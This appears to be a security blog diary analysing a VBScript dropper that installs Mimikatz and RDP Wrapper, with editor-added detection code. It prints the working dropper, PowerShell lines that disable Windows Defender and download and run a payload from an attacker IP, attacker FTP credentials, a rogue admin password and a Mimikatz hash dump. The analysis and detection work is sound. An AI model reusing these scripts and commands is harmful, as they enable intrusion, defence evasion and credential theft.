Simple Mimikatz & RDPWrapper Dropper

Published: 2019-08-22
Last Updated: 2019-08-23 04:55:06 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Let's review a malware sample that I spotted a few days ago. I found it interesting because it does not use advanced techniques to infect its victims. The initial sample is a malicious VBScript. For a few weeks, I have been hunting for more PowerShell based on encoded directives. The following regular expression matched the file; its three alternatives are the Base64 encoding of 'New-Object' at each of the three possible byte alignments within a 3-byte group, which is why the boundary characters appear as classes such as [A-P] or [0EUk]:

// New-Object
$enc09 = /(TmV\x33LU\x39iamVjd[A-P]|[\x2b\x2f-\x39A-Za-z][\x2b\x2f-\x39A-Za-z][\x31\x35\x39BFJNRVZdhlptx]OZXctT\x32JqZWN\x30[\x2b\x2f-\x39A-Za-z]|[\x2b\x2f-\x39A-Za-z][\x30EUk]\x35ldy\x31PYmplY\x33[Q-T])/
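
To make the three alternatives less magic, here is an added example (written for this edit, not part of the original diary) that derives such a pattern for any byte string: Base64 emits one character per 6 bits, so a needle can start at byte 0, 1 or 2 of a 3-byte input group, and the output characters that straddle the needle boundary become character classes rather than literals. It also shows a caveat a hunter should keep in mind: PowerShell's -EncodedCommand takes UTF-16LE, so a rule derived from the ASCII needle never fires on it, while the same generator fed the UTF-16LE needle does. Only ENC09 is transcribed from the rule above; the payload strings and the example.invalid URL are constructed.

```python
"""Derive a regex for the Base64 encoding of a byte string at all three
alignments and compare it with the $enc09 rule above.

Added example, not part of the original diary: only ENC09 is transcribed from
the rule; the needle/payload strings and the example.invalid URL are constructed.
"""
import base64
import re

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# The diary's rule, transcribed verbatim; Python's re understands the \xNN escapes.
ENC09 = (
    r"(TmV\x33LU\x39iamVjd[A-P]"
    r"|[\x2b\x2f-\x39A-Za-z][\x2b\x2f-\x39A-Za-z][\x31\x35\x39BFJNRVZdhlptx]OZXctT\x32JqZWN\x30[\x2b\x2f-\x39A-Za-z]"
    r"|[\x2b\x2f-\x39A-Za-z][\x30EUk]\x35ldy\x31PYmplY\x33[Q-T])"
)


def _char_class(chars):
    """A literal for a fully determined symbol, a bracket expression otherwise."""
    if len(chars) == 1:
        return re.escape(chars[0])
    return "[" + "".join(re.escape(c) for c in chars) + "]"


def b64_pattern(needle, offset):
    """Regex fragment for `needle` starting `offset` (0, 1 or 2) bytes into a
    3-byte input group.  Every output symbol carries 6 bits: symbols whose six
    bits all come from the needle are literals; symbols that straddle the
    needle boundary keep only the alphabet characters consistent with the
    known bits, which is where classes such as [A-P] or [0EUk] come from."""
    assert offset in (0, 1, 2)
    base = offset * 8
    known = {}                                   # absolute bit index -> bit value
    for i, byte in enumerate(needle):
        for b in range(8):
            known[base + i * 8 + b] = (byte >> (7 - b)) & 1
    first_sym = base // 6
    last_sym = (base + len(needle) * 8 - 1) // 6
    parts = []
    for s in range(first_sym, last_sym + 1):
        allowed = [B64_ALPHABET[v] for v in range(64)
                   if all(known.get(s * 6 + b) in (None, (v >> (5 - b)) & 1) for b in range(6))]
        parts.append(_char_class(allowed))
    return "".join(parts)


def encoded_needle_regex(needle):
    """Alternation over the three alignments: the shape of $enc09."""
    return "(?:" + "|".join(b64_pattern(needle, k) for k in range(3)) + ")"


def alignment_hits(pattern, payload):
    """Encode `payload` with 0, 1 and 2 leading filler bytes and report whether
    `pattern` matches each encoding; a complete rule yields [True, True, True]."""
    rx = re.compile(pattern)
    return [rx.search(base64.b64encode(b"A" * k + payload).decode("ascii")) is not None
            for k in range(3)]


if __name__ == "__main__":
    ascii_payload = b"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    print("diary rule, ASCII     :", alignment_hits(ENC09, ascii_payload))
    print("generated, ASCII      :", alignment_hits(encoded_needle_regex(b"New-Object"), ascii_payload))
    # Caveat: powershell -EncodedCommand takes UTF-16LE, so each character is followed
    # by a NUL byte and the ASCII-derived rule never fires; feed the generator the
    # UTF-16LE needle instead to cover that case.
    u16_payload = ascii_payload.decode("ascii").encode("utf-16-le")
    print("diary rule, UTF-16LE  :", alignment_hits(ENC09, u16_payload))
    print("generated, UTF-16LE   :", alignment_hits(encoded_needle_regex("New-Object".encode("utf-16-le")), u16_payload))
```

The generated fragments drop the leading wildcard characters that $enc09 carries, which only serve to make the match start on a full symbol; the literal and class parts are identical.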

The initial script (SHA256:bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5) is, still today, detected by only one AV engine[1]. Here is a beautified version of the script:

sDir = "C:\ProgramData\ID.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
' Infection marker: when ID.dat already exists the dropper only deletes itself
If oFSO.FileExists(sDir) Then
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
Else ' branch lost in the extracted copy; restored to match the behaviour described below
    Dim ShaDev
    ' ProgID was blank in the extracted copy; ExpandEnvironmentStrings is a WScript.Shell method
    set hfhejotgbhzlzyohafchtul = createobject("WScript.Shell")
    ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%ProgramData%")
    ' Base64 decoding via MSXML: nodeTypedValue of a bin.base64 element yields the raw bytes
    Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
    shadow.dataType = "bin.base64" ' needed for nodeTypedValue to decode; absent from the extracted copy
    shadow.text="... [Base64 chunk of dat] ..."
    Set sexy=CreateObject("ADODB.Stream")
    sexy.Type = 1 ' adTypeBinary; Type/Open are needed for Write and were absent from the extracted copy
    sexy.Open
    sexy.Write shadow.nodeTypedValue
    sexy.SaveToFile ShaDev & "\WindowsProtect.vbs",2 ' 2 = adSaveCreateOverWrite

    ' Terminate every process whose name matches ProcessName, via WMI
    Sub KillAll(ProcessName)
        Dim objWMIService, colProcess
        Dim strComputer, strList, p
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
        Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name like '" & ProcessName & "'")
        For Each p in colProcess
            p.Terminate ' loop body lost in the extracted copy; Win32_Process.Terminate is the standard call
        Next
    End Sub

    KillAll "cmd.exe"

    ' Keep re-launching the elevation prompt (ShellExecute with the "runas" verb, hidden window)
    ' until a cmd.exe is seen running, i.e. until the user accepts UAC and
    ' "cmd /k" starts the second stage through the .vbs file association
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Do
        Running = False
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
        For Each objItem in colItems
            If objItem.Name = "cmd.exe" Then
                Running = True
                Exit For
            End If
        Next
        If Not Running Then
            Set objShell = CreateObject("Shell.Application")
            objShell.ShellExecute "cmd", "/k ""C:\ProgramData\WindowsProtect.vbs", "", "runas", 0
        End If
    Loop While Not Running
    WScript.Sleep 4000

    KillAll "cmd.exe"

    ' Drop the infection marker, then remove the dropper itself
    Dim fso, MyFile
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set MyFile = fso.CreateTextFile("C:\ProgramData\ID.dat", True)
    MyFile.WriteLine(" ")

    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
End If

The script is not obfuscated, so its behaviour is easy to understand. It first checks whether the victim has already been infected by testing for the existence of the 'ID.dat' marker file. If the marker exists, the script deletes itself and exits. Otherwise, the second-stage VBScript is Base64-decoded and dropped on disk as 'WindowsProtect.vbs', then launched through 'cmd /k' with the 'runas' verb; this triggers a UAC prompt, and the dropper keeps re-launching it until a cmd.exe process is seen, i.e. until the prompt is accepted. Finally the marker file is created and the dropper deletes itself. Let's have a look at the second stage.

The decoded Base64 data (SHA256:6a25a0dbc0627e36e307e87e677e307d08982720c3dbeffe9986c3c770c37fa8) is unknown on VT. Here is the script:

Dim x
Dim y
Dim z
' Three PowerShell one-liners, run hidden (window style 0) one after the other:
' 1. turn off Defender's IOAV protection (scanning of downloaded files and attachments)
x = " Set-MpPreference -DisableIOAVProtection $true"
' 2. exclude the whole C: drive from Defender scanning
y = " Add-MpPreference -ExclusionPath 'C:\'"
' 3. fetch the payload (served with an .mp3 name) as 'Isass.exe' (capital I, mimicking lsass.exe) and run it
z = " -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://92[.]53[.]91[.]141/MP3/T0R.mp3','C:\ProgramData\Isass.exe');Start-Process 'C:\ProgramData\Isass.exe'"
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
command = ("powershell" & x )
commany = ("powershell" & y )
commanz = ("powershell" & z )
objShell.Run command,0
objShell.Run commany,0
objShell.Run commanz,0
Set objShell = Nothing
' Self-delete once the payload has been started
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName
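
These three command lines are a compact detection opportunity. Below is an added example (mine, not from the diary) of the checks a SOC would run over process-creation telemetry: a script host (wscript.exe) spawning PowerShell, Set-/Add-MpPreference calls that disable a protection or add an exclusion (the whole C: drive here), a download cradle combined with -ExecutionPolicy bypass and -windowstyle hidden, and a dropped file whose name is a look-alike of lsass.exe. The events are constructed to mirror the script (the URL uses a documentation address, not the real IP) and loosely follow Sysmon event ID 1 field names; the two benign events show that the rules stay quiet on ordinary PowerShell use.

```python
"""Detection checks for the second-stage behaviour, run over constructed
process-creation events.  Added example, not part of the diary."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"

# Constructed events, not real telemetry; 192.0.2.10 is an RFC 5737 documentation address.
EVENTS = [
    ProcEvent(WSCRIPT, POWERSHELL, "powershell  Set-MpPreference -DisableIOAVProtection $true"),
    ProcEvent(WSCRIPT, POWERSHELL, "powershell  Add-MpPreference -ExclusionPath 'C:\\'"),
    ProcEvent(WSCRIPT, POWERSHELL,
              "powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden "
              "(New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/MP3/T0R.mp3',"
              "'C:\\ProgramData\\Isass.exe');Start-Process 'C:\\ProgramData\\Isass.exe'"),
    ProcEvent(r"C:\Windows\explorer.exe", POWERSHELL, "powershell Get-MpPreference"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", POWERSHELL, "powershell -NoProfile -Command Get-Process lsass"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Set-/Add-MpPreference followed by a -Disable*Protection/-Disable*Monitoring switch or an exclusion
DEFENDER_TAMPER = re.compile(
    r"(?i)\b(?:Set|Add)-MpPreference\b.*?-(?:Disable\w*(?:Protection|Monitoring)|Exclusion(?:Path|Process|Extension))")
# An exclusion that is a bare drive root such as C:\ (i.e. everything)
DRIVE_ROOT_EXCLUSION = re.compile(r"""(?i)-ExclusionPath\s+['"]?[A-Za-z]:\\?['"]?(?=\s|;|$)""")
DOWNLOADER = re.compile(r"(?i)Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod")
EVASION_FLAGS = re.compile(r"(?i)-(?:w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)?\s+bypass)")
EXE_TOKENS = re.compile(r"(?i)[\w.-]+\.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def lsass_lookalike(name):
    """True for file names that become 'lsass.exe' once i/1 are read as l, but are not lsass.exe."""
    n = basename(name)
    return n != "lsass.exe" and n.replace("i", "l").replace("1", "l") == "lsass.exe"


def classify(ev):
    """Set of rule names that fire on one process-creation event."""
    hits = set()
    cmd = ev.command_line
    if basename(ev.parent_image) in SCRIPT_HOSTS and basename(ev.image) == "powershell.exe":
        hits.add("script_host_spawns_powershell")
    if DEFENDER_TAMPER.search(cmd):
        hits.add("defender_tamper")
    if DRIVE_ROOT_EXCLUSION.search(cmd):
        hits.add("drive_root_exclusion")
    if DOWNLOADER.search(cmd) and (EVASION_FLAGS.search(cmd) or re.search(r"(?i)Start-Process", cmd)):
        hits.add("download_cradle")
    if any(lsass_lookalike(tok) for tok in EXE_TOKENS.findall(cmd)):
        hits.add("lsass_lookalike_filename")
    return hits


def triage(events):
    """(truncated command line, sorted rule hits) for each event."""
    return [(ev.command_line[:60], sorted(classify(ev))) for ev in events]


if __name__ == "__main__":
    for cmd, hits in triage(EVENTS):
        print(f"{hits or '-'}  <- {cmd}")
```

Real deployments should also watch Defender's own log (the operational log records preference changes) and alert on any exclusion covering a drive root or ProgramData, regardless of how it was set.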

The next stage is the malicious PE file (SHA256:b5cc67c06f1352039209557aa8e62e1eabefaa4646fe449326bf50f62382eacd), saved as 'Isass.exe' (capital 'I', a look-alike of the legitimate lsass.exe). It is also unknown on VT. It's a classic PE file:

root@remnux:~# exiftool Isass.exe
ExifTool Version Number         : 9.46
File Name                       : Isass.exe
Directory                       : /tmp
File Size                       : 4.6 MB
File Modification Date/Time     : 2019:08:22 14:44:24-04:00
File Access Date/Time           : 2019:08:22 14:44:23-04:00
File Inode Change Date/Time     : 2019:08:22 14:44:24-04:00
File Permissions                : rw-r--r--
File Type                       : Win32 EXE
MIME Type                       : application/octet-stream
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2017:08:11 09:54:06-04:00
PE Type                         : PE32
Linker Version                  : 14.0
Code Size                       : 188928
Initialized Data Size           : 69632
Uninitialized Data Size         : 0
Entry Point                     : 0x1cec9
OS Version                      : 5.1
Image Version                   : 0.0
Subsystem Version               : 5.1
Subsystem                       : Windows GUI

The PDB path ('D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb') discloses that the PE file is a WinRAR self-extracting archive (SFX). Program Database (PDB) files hold the debugging information produced when a program is compiled (symbols, addresses, names of resources, etc.); the path to the PDB is embedded in the executable's debug directory, which is why it survives in the final binary.

An SFX archive can execute a command once its content has been unpacked; the 'Setup=' directive of the SFX script is easy to spot in the PE strings:

root@remnux:~# strings Isass.exe | grep Setup=
Setup=%SystemDrive%\Intel\Logs\h32.exe %SystemDrive%\Intel\Logs\beforeinstall.bat

Here is an extract of the batch script launched by that Setup= line:

@echo off
REM The SFX extracted everything into %CURRENTPATH%; the tooling is moved to a
REM Windows-looking folder under ProgramData before the installer runs
set CURRENTPATH=%SystemDrive%\Intel\Logs
set INSTALLPATH=%SystemDrive%\ProgramData\Microsoft\Windows\Updates

del /F /Q %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\h64.exe %INSTALLPATH%\h64.exe
move /Y %CURRENTPATH%\h32.exe %INSTALLPATH%\h32.exe
move /Y %CURRENTPATH%\zip.exe %INSTALLPATH%\zip.exe
move /Y %CURRENTPATH%\ncftpput.exe %INSTALLPATH%\ncftpput.exe
move /Y %CURRENTPATH%\ftps.cfg %INSTALLPATH%\ftps.cfg
move /Y %CURRENTPATH%\install.bat %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\mimitask.bat %INSTALLPATH%\mimitask.bat

REM 32- vs 64-bit detection from the CPU description in the registry
reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT

if %OS%==32BIT set hidexe=h32.exe
if %OS%==64BIT set hidexe=h64.exe

REM h32.exe / h64.exe run install.bat and its output is logged; the variable name
REM suggests a hidden-window launcher, but the page does not analyse these binaries
%hidexe% install.bat >> %INSTALLPATH%\Service\install.log 2>>&1

REM Clean up the extraction folder, then delete this batch file (%~f0 is its own full path)
rmdir /S /Q %CURRENTPATH%\Tor
rmdir /S /Q %CURRENTPATH%\Data
rmdir /S /Q %CURRENTPATH%\Tor
DEL /Q /F %CURRENTPATH%\ncftpput.exe
DEL /Q /F %CURRENTPATH%\ftps.cfg
DEL /Q /F %CURRENTPATH%\install.bat
DEL /Q /F %CURRENTPATH%\mimitask.bat
DEL /Q /F  "%~f0" > NUL

You can see that many files are dropped on the infected computer. The more interesting ones are:

  • ncftpput.exe (FTP upload client used for exfiltration)
  • ftps.cfg (its configuration, including the FTP credentials)
  • mimitask.bat
  • install.bat
  • Tor package

The 'install.bat' script (SHA256:550e8e6fcfc4db2139dfa2e6e4f26e881b405e21b752a750d4cc682da0361567) is also very interesting and also unknown on VT. It is too big to be posted here, so here is an overview of its features:

  • Check the geographical location of the victim via different GeoIP services
  • Create a new administrator user ('Admlnlstrator') with the following password: ‘Zhopka222222'
  • Disable Windows Defender
  • Install RDP Wrapper library[2]
  • Dump credentials via Mimikatz
  • Install a scheduled task to re-execute Mimikatz and exfiltrate data at each boot time.

The RDP Wrapper is fetched from another site: hxxp://yourdatafor[.]me:94/azaza/. RDP Wrapper enables Remote Desktop (including concurrent sessions) on Windows editions that do not offer it; combined with the rogue administrator account, it gives the attacker interactive remote access to the victim.

Collected data is exfiltrated via FTP (FTP is still alive!) using the ncftpput.exe tool. The configuration is present in the archive, in the ftps.cfg file:

root@remnux:~# cat ftps.cfg
user ftpuser
pass Super123123

Yes, even attackers use weak passwords! The server is not protected and allows anyone to download all the files collected from victims. The domain '' was registered on July 16th, 2019.

I synchronized them for a few days (the FTP server is now down). For each victim, two files were uploaded:

The first one contains the malware installation logs:

root@remnux:~# unzip -t
    testing: Program Files/RDP Wrapper/hostname.log   OK
    testing: Program Files/RDP Wrapper/installer.log   OK
    testing: Program Files/RDP Wrapper/tor_install.log   OK
No errors detected in compressed data of

The second one contains the output of Mimikatz:

root@remnux:~# unzip -t
    testing: ProgramData/Microsoft/NetFramework/Test/credoz.txt   OK
No errors detected in compressed data of

Each of these archives contains the same file, 'credoz.txt', with the Mimikatz output:

root@remnux:~# head -30 credoz.txt
Hostname: [redacted] / authority\system-authority\system

  .#####.   mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( )
 ## \ / ##       >
 '## v ##'       Vincent LE TOUX             ( )
  '#####'        > /   ***/

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 2254335948 (00000000:865e6fcc)
Session           : RemoteInteractive from 2
User Name         : Admlnlstrator
Domain            : [redacted]
Logon Server      : [redacted]
Logon Time        : 2019/08/17 19:33:43
SID               : S-1-5-21-2984074050-2788484596-579673664-1006
        msv :
         [00000003] Primary
         * Username : Admlnlstrator
         * Domain   : [redacted]
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
         [00010000] CredentialKeys
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
        tspkg :
        wdigest :
         * Username : Admlnlstrator

You can see that the rogue administrator account has been used: its session type, 'RemoteInteractive', is an RDP logon, which is what the RDP Wrapper was installed for. In one week, I collected 188 credential files from the FTP server! Because new files are re-uploaded at every reboot, the number of unique victims is lower, 53:

root@remnux:~# ls -1 creds/*.zip|awk -F "_" '{ print $1 }'|sort -u|wc -l

Did you see the same kind of activity? Do you have more information about this malware? Feel free to share!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
